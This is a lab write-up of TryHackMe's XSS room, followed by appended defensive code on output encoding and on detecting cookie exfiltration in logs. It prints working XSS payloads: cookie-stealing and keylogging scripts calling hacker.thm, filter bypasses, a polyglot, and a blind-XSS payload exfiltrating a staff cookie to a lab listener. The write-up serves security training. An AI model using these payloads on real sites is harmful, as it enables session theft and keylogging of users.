Cross-Site Scripting

February 27, 2024

Task 1: Room Brief

Task 2: XSS Payloads

<script>alert('XSS');</script>

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

<script>user.changeEmail('attacker@hacker.thm');</script>

Task 3: Reflected XSS

Task 4: Stored XSS

Task 5: DOM Based XSS

Task 6: Blind XSS

Task 7: Perfecting your payload

  • First Task

First, when we visit the website it shows an input box asking for our name. After we enter a name, it is displayed automatically.

Now, instead of entering our name, we insert our payload into the input text box. This pops an alert box, which shows that the input text box is vulnerable because it does not validate the user's input.

After that, the alert box appears every time we refresh the page, but when we clear the URL and load the page fresh, the XSS payload is gone, which shows the payload is reflected rather than stored.

<script>alert('THM');</script>

  • Second Task

For the second task, we again enter our name in the input text box to see how the page handles it. The result shows the "Hello" text, and our name is placed inside the value attribute of an input tag.

We can see our name inside the input tag as value = kyou.

Now we insert our newly crafted payload into the level 2 input text box. Note the "> at the start of the payload: the " closes the value attribute and the > closes the input tag, so the script tag that follows lands in the page body. See the image below.

"><script>alert('THM');</script>

  • Third Task

For the third task, we again test the textarea tag: we input our name and check the result.

As we can see, the textarea tag contains our name, kyou.

Now that we know how the parameter is rendered in the page source, we modify our XSS payload. Adding a </textarea> at the beginning of the payload closes the textarea tag, so the script tag that follows is parsed as HTML.

Therefore, the alert function executes.

</textarea><script>alert('THM');</script>

As you can see, the payload works: the textarea closes and our script executes.

  • Fourth Task

For the fourth task, we again try the input box with our name. The page looks the same as in the previous levels.

This time, however, our name is placed inside JavaScript code in the page source.

"You'll have to escape the existing JavaScript command, so you're able to run your code; you can do this with the following payload ';alert('THM');// which you'll see from the below screenshot will execute your code.

';alert('THM');//

The ' closes the field specifying the name, then ; signifies the end of the current command, and the // at the end makes anything after it a comment rather than executable code." - TryHackMe

  • Fifth Task

As usual, we first try our name in the input text box.

Here the name is returned as normal text.

But when we try the normal XSS payload we get this result: the script tag is stripped from the payload and only the alert text remains, which causes an error, so our alert function does not execute.

Therefore, there is a filter in the code that removes the word script, or other potentially dangerous words and tag names.

<script>alert('THM');</script>

There is a trick to bypass this filter: we modify our XSS payload with extra letters so that, once the word "script" is removed, what remains is still a script tag. See the picture below.

<sscriptcript>alert('THM');</sscriptcript>

As we can see in the page source, the script tag survives the filter and the script executes in the web page.

  • Sixth Task

The sixth task is different from the tasks so far. It asks for an image path, so we give the default path for cat.jpg: /images/cat.jpg.

It then displays the cat picture, an orange cat.

When we view the page source, it is a normal img tag whose src attribute has the value /images/cat.jpg.

When we try an XSS payload like the one from the second task, the page source shows the result below and we do not get the expected alert in the web page.

The < and > characters are being filtered out from our payload, preventing us from escaping the IMG tag.

"><script>alert('THM');</script>

"To get around the filter, we can take advantage of the additional attributes of the IMG tag, such as the onload event. The onload event executes the code of your choosing once the image specified in the src attribute has loaded onto the web page. Let's change our payload to reflect this /images/cat.jpg" onload="alert('THM'); and then viewing the page source, and you'll see how this will work." - TryHackMe
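The levels in the Second Task through the Sixth Task all break out of a different output context (attribute, textarea, JavaScript string, a single-pass word filter, an image src attribute). The following is an added defensive example, not code from the TryHackMe room: it puts a blacklist modelled on level 5 next to context-aware output encoding and renders the room's own payloads through templates (`renderAttr`, `renderTextarea`, `renderImg`, `renderJsVar` are assumed stand-ins for the level pages) to show which treatment actually neutralises them.

```javascript
// Added defensive example, not code from the room: the single-pass blacklist
// behind level 5 next to context-aware output encoding, which neutralises the
// breakout payloads used in levels 2 to 6 without any blacklist.

// Naive blacklist modelled on level 5: delete the word "script" in one pass.
function naiveStripScript(input) {
  return input.replace(/script/gi, "");
}

// Encoder for the HTML body and quoted-attribute contexts (levels 1, 2, 3, 6).
function encodeForHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for a value inside a JavaScript string literal (level 4): quotes,
// backslashes, angle brackets and line breaks become \xHH escapes.
function encodeForJsString(input) {
  return input.replace(/[\\'"<>\r\n]/g,
    (c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0"));
}

// Assumed templates mirroring how each level embeds the name; `treat` is the
// sanitiser applied first (identity function = no protection at all).
const identity = (s) => s;
const renderAttr = (name, treat) => '<input value="' + treat(name) + '">';
const renderTextarea = (name, treat) => "<textarea>" + treat(name) + "</textarea>";
const renderImg = (name, treat) => '<img src="' + treat(name) + '">';
const renderJsVar = (name, treat) => "<script>var name = '" + treat(name) + "';</script>";

// Number of HTML tags in a rendered fragment: a safe rendering has exactly the
// template's own tags, a breakout adds more.
function tagCount(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}

// Breakout payloads exactly as used in the room's levels 2 to 6.
const level2 = "\"><script>alert('THM');</script>";
const level3 = "</textarea><script>alert('THM');</script>";
const level4 = "';alert('THM');//";
const level5 = "<sscriptcript>alert('THM');</sscriptcript>";
const level6 = "/images/cat.jpg\" onload=\"alert('THM');";
```

Running `naiveStripScript(level5)` reconstitutes a full script tag, while `encodeForHtml` leaves no `<` at all; `tagCount` on the rendered templates shows the encoded versions keep only the template's own tags.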

  • Seventh Task

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e

Task 8: Practical Example (Blind XSS)

For the last task, we first have to create an account so we can view the "Support Ticket" page.

  • username: kyou

  • email: kyou@kyou.com

  • pass: qwerty123

After we sign in to the website using the credentials we made, we create a ticket:

  • ticket subj: test

  • ticket contents: test

Here we can see the ticket that we made.

As we can see, our "Ticket Contents" is placed inside a textarea tag.

Therefore, we create another ticket, this time inserting </textarea>test as the contents.

This tests whether the textarea tag closes.

</textarea>test2

When we view ticket id 4, we can see that the word test2 is outside the textarea. Therefore, we succeeded in closing the textarea tag.

We can confirm this by looking at the page source.


</textarea><script>fetch('http://10.9.193.229:4444?cookie=' + btoa(document.cookie) );</script>
cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ==
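What a defender sees from the blind XSS above is an outbound request from a staff browser carrying a base64 cookie to an unfamiliar host. The following is an added detection example, not part of the room: it scans proxy log lines for the pattern used in Task 2 and Task 8. The log format, the client and listener addresses and the cookie value are all constructed samples.

```javascript
// Added detection example, not part of the room: scan proxy log lines for the
// cookie-exfiltration pattern used in Task 2 and Task 8 (a base64-encoded
// document.cookie sent as a "cookie" query parameter to an outside host).
// The log format, addresses and cookie value below are constructed samples.

const constructedCookie = "staff-session=EXAMPLE0123456789";

// Constructed log lines in the form "<client> <method> <url> <status>"; the
// second one is what a staff browser would emit after rendering the payload.
const sampleLogLines = [
  "10.0.0.5 GET https://intranet.example/support/ticket/4 200",
  "10.0.0.5 GET http://198.51.100.7:4444/?cookie=" +
    Buffer.from(constructedCookie).toString("base64") + " 200",
  "10.0.0.9 GET https://intranet.example/images/cat.jpg 200",
  "10.0.0.9 GET https://shop.example/?cookie=yes 200",
];

// Decode base64 strictly: null unless the text round-trips through base64.
function decodeBase64(value) {
  const buf = Buffer.from(value, "base64");
  const canonical = buf.toString("base64").replace(/=+$/, "");
  if (buf.length === 0 || canonical !== value.replace(/=+$/, "")) return null;
  return buf.toString("utf8");
}

// Return one finding per line whose "cookie" query parameter decodes to a
// name=value cookie string; the raw query is read so a "+" in the base64 is
// not turned into a space, and benign uses of a cookie parameter are ignored.
function findCookieExfil(lines) {
  const findings = [];
  for (const line of lines) {
    const parts = line.split(" ");
    if (parts.length < 4) continue;
    let url;
    try { url = new URL(parts[2]); } catch { continue; }
    const m = /[?&]cookie=([A-Za-z0-9+/=]+)/.exec(url.search);
    if (!m) continue;
    const decoded = decodeBase64(m[1]);
    if (decoded !== null && /^[\w-]+=\S+/.test(decoded)) {
      findings.push({ client: parts[0], host: url.host, cookie: decoded });
    }
  }
  return findings;
}
```

`findCookieExfil(sampleLogLines)` returns a single finding for the listener line, with the decoded session cookie, and ignores the plain `cookie=yes` parameter.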
